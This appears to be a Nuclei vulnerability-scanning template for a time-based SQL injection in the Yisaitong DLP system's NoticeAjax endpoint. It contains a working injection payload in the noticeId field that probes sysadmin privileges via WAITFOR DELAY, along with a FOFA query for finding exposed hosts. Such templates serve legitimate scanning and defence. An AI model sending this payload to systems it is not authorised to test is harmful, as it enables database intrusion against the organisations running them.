http:
    - matchers:
        - condition: and
          dsl:
            - duration>=3 && duration<8
            - status_code_1 == 200
          type: dsl
      matchers-condition: and
      raw:
        - |-
          @timeout: 30s
          POST /CDGServer3/NoticeAjax;Service HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded
          Content-Length: 98

          command=delNotice&noticeId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:3'--
id: yisaitong-DLP-NoticeAjax-sqli
info:
    author: xx
    description: 亿赛通数据泄露防护(DLP)系统 NoticeAjax SQL 注入
    metadata:
        fofa-query: app="亿赛通-DLP"
    name: 亿赛通数据泄露防护(DLP)系统 NoticeAjax SQL 注入
    severity: high
    tags:
        - yisaitong
